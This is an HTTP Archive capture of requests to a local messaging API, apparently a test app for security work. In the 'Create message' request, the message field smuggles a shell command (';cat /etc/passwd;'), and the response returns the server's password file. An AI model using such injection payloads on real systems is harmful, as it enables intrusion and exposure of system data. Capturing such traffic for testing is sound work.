{
  "log": {
    "version": "1.2",
    "creator": {
      "name": "WebInspector",
      "version": "537.36"
    },
    "pages": [
      {
        "startedDateTime": "2017-10-26T10:15:29.289Z",
        "id": "page_2",
        "title": "http://127.0.0.1:7777/",
        "pageTimings": {
          "onContentLoad": 99.09399994648993,
          "onLoad": 95.20400001201779
        }
      },
      {
        "startedDateTime": "2017-10-26T10:03:31.423Z",
        "id": "page_1",
        "title": "http://127.0.0.1:7777/api/users?user=dd",
        "pageTimings": {
          "onContentLoad": 108.098000055179,
          "onLoad": 101.1620000936091
        }
      }
    ],
    "entries": [
      {
        "startedDateTime": "2017-10-26T09:49:19.014Z",
        "time": 19.465558998053893,
        "request": {
          "method": "POST",
          "url": "http://127.0.0.1:7777/api/users",
          "httpVersion": "HTTP/1.1",
          "headers": [
            {
              "name": "Authorization",
              "value": "Token b5638ae7-6e77-4585-b035-7d9de2e3f6b3"
            },
            {
              "name": "Origin",
              "value": "http://127.0.0.1:7777"
            },
            {
              "name": "Accept-Encoding",
              "value": "gzip, deflate, br"
            },
            {
              "name": "Host",
              "value": "127.0.0.1:7777"
            },
            {
              "name": "Accept-Language",
              "value": "en-US,en;q=0.8"
            },
            {
              "name": "User-Agent",
              "value": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36"
            },
            {
              "name": "Content-Type",
              "value": "application/json; charset=UTF-8"
            },
            {
              "name": "Accept",
              "value": "*/*"
            },
            {
              "name": "Referer",
              "value": "http://127.0.0.1:7777/"
            },
            {
              "name": "Cookie",
              "value": ".AspNetCore.Antiforgery.a6BorKCfoC4=CfDJ8DL4GupRCDNGl_0OiAd3qWP5O9gu_LiedsgcLWhaCgn88Ru8oWwXGQvL3PXNdZ0n5TjUPody5ZI01g6DQyaaphE4U6osQ8UW4ek9hlOQX0XFvIg9G3vGuvPt1XiJkxzxEtoPMlepzIig3KblZd5YsOs"
            },
            {
              "name": "Connection",
              "value": "keep-alive"
            },
            {
              "name": "Content-Length",
              "value": "62"
            }
          ],
          "queryString": [],
          "cookies": [
            {
              "name": ".AspNetCore.Antiforgery.a6BorKCfoC4",
              "value": "CfDJ8DL4GupRCDNGl_0OiAd3qWP5O9gu_LiedsgcLWhaCgn88Ru8oWwXGQvL3PXNdZ0n5TjUPody5ZI01g6DQyaaphE4U6osQ8UW4ek9hlOQX0XFvIg9G3vGuvPt1XiJkxzxEtoPMlepzIig3KblZd5YsOs",
              "expires": null,
              "httpOnly": false,
              "secure": false
            }
          ],
          "headersSize": 676,
          "bodySize": 62,
          "postData": {
            "mimeType": "application/json; charset=UTF-8",
            "text": "{\"user\":\"dd\",\"first\":\"mike\",\"last\":\"smith\",\"password\":\"hello\"}"
          }
        },
        "response": {
          "status": 201,
          "statusText": "CREATED",
          "httpVersion": "HTTP/1.1",
          "headers": [
            {
              "name": "Date",
              "value": "Thu, 26 Oct 2017 09:49:19 GMT"
            },
            {
              "name": "Server",
              "value": "TwistedWeb/17.9.0"
            },
            {
              "name": "X-Powered-By",
              "value": "PHP/7.0.11"
            },
            {
              "name": "Content-Length",
              "value": "15"
            },
            {
              "name": "Content-Type",
              "value": "application/json"
            }
          ],
          "cookies": [],
          "content": {
            "size": 15,
            "mimeType": "application/json",
            "compression": 0,
            "text": "{\"user_id\": 2}\n"
          },
          "redirectURL": "",
          "headersSize": 166,
          "bodySize": 15,
          "_transferSize": 181
        },
        "cache": {},
        "timings": {
          "blocked": 1.1815590288024402,
          "dns": -1,
          "ssl": -1,
          "connect": -1,
          "send": 0.13099994976072993,
          "wait": 18.420999986119572,
          "receive": 1.7320000333711505,
          "_blocked_queueing": 0.5590000655502081
        },
        "serverIPAddress": "",
        "connection": "488864"
      },
			{
				"startedDateTime": "2021-05-07T21:44:46.334Z",
				"time": 108.254,
				"request": {
					"method": "GET",
					"url": "http://skullkitty:7777/api/messages",
					"httpVersion": "HTTP/1.1",
					"cookies": [],
					"headers": [
						{
							"name": "Authorization",
							"value": "Basic am9objpoZWxsbw=="
						}
					],
					"queryString": [],
					"postData": {
						"mimeType": "",
						"text": "",
						"params": []
					},
					"headersSize": -1,
					"bodySize": -1,
					"settingEncodeUrl": true
				},
				"response": {
					"status": 200,
					"statusText": "OK",
					"httpVersion": "HTTP/1.1",
					"cookies": [],
					"headers": [
						{
							"name": "Server",
							"value": "TwistedWeb/20.3.0"
						},
						{
							"name": "Date",
							"value": "Wed, 03 Mar 2021 18:25:45 GMT"
						},
						{
							"name": "Content-Type",
							"value": "application/json"
						},
						{
							"name": "Content-Length",
							"value": "74"
						},
						{
							"name": "X-Powered-By",
							"value": "PHP/7.0.11"
						}
					],
					"content": {
						"size": 74,
						"mimeType": "application/json",
						"text": "[{\"msg_id\": 1, \"from_id\": 1, \"to_id\": 1, \"subject\": \"Hello From Myself\"}]\n"
					},
					"redirectURL": "",
					"headersSize": -1,
					"bodySize": -1
				},
				"cache": {},
				"timings": {
					"blocked": -1,
					"dns": -1,
					"connect": -1,
					"send": 0,
					"wait": 108.254,
					"receive": 0,
					"ssl": -1
				},
				"comment": "Get all messages"
			},
			{
				"startedDateTime": "2021-05-07T21:44:46.334Z",
				"time": 115.002,
				"request": {
					"method": "POST",
					"url": "http://skullkitty:7777/api/messages",
					"httpVersion": "HTTP/1.1",
					"cookies": [],
					"headers": [
						{
							"name": "Content-Type",
							"value": "application/json"
						},
						{
							"name": "Authorization",
							"value": "Basic am9objpoZWxsbw=="
						}
					],
					"queryString": [],
					"postData": {
						"mimeType": "application/json",
						"text": "{\n\t\"from_id\": 1,\n\t\"to_id\": 1,\n\t\"subject\": \"Welcome!\",\n\t\"msg\": \"\\\";cat /etc/passwd;\\\"\"\n}\n",
						"params": []
					},
					"headersSize": -1,
					"bodySize": -1,
					"settingEncodeUrl": true
				},
				"response": {
					"status": 201,
					"statusText": "CREATED",
					"httpVersion": "HTTP/1.1",
					"cookies": [],
					"headers": [
						{
							"name": "Server",
							"value": "TwistedWeb/20.3.0"
						},
						{
							"name": "Date",
							"value": "Fri, 05 Mar 2021 20:11:40 GMT"
						},
						{
							"name": "Content-Type",
							"value": "application/json"
						},
						{
							"name": "Content-Length",
							"value": "1820"
						},
						{
							"name": "X-Powered-By",
							"value": "PHP/7.0.11"
						}
					],
					"content": {
						"size": 1820,
						"mimeType": "application/json",
						"text": "{\"msg_id\": 2, \"cmd_output\": \"\\nroot:x:0:0:root:/root:/bin/bash\\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\\nsync:x:4:65534:sync:/bin:/bin/sync\\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\\nirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\\nsystemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin\\nsystemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin\\nsyslog:x:102:106::/home/syslog:/usr/sbin/nologin\\nmessagebus:x:103:107::/nonexistent:/usr/sbin/nologin\\n_apt:x:104:65534::/nonexistent:/usr/sbin/nologin\\nlxd:x:105:65534::/var/lib/lxd/:/bin/false\\nuuidd:x:106:110::/run/uuidd:/usr/sbin/nologin\\ndnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin\\nlandscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin\\nsshd:x:109:65534::/run/sshd:/usr/sbin/nologin\\npollinate:x:110:1::/var/cache/pollinate:/bin/false\\nmike:x:1000:1000:mike,,,:/home/mike:/bin/bash\\npostgres:x:111:116:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash\\nredis:x:112:117::/var/lib/redis:/usr/sbin/nologin\\ngitlab-runner:x:999:998:GitLab Runner:/home/gitlab-runner:/bin/bash\\n\"}\n"
					},
					"redirectURL": "",
					"headersSize": -1,
					"bodySize": -1
				},
				"cache": {},
				"timings": {
					"blocked": -1,
					"dns": -1,
					"connect": -1,
					"send": 0,
					"wait": 115.002,
					"receive": 0,
					"ssl": -1
				},
				"comment": "Create message"
			}
    ]
  }
}
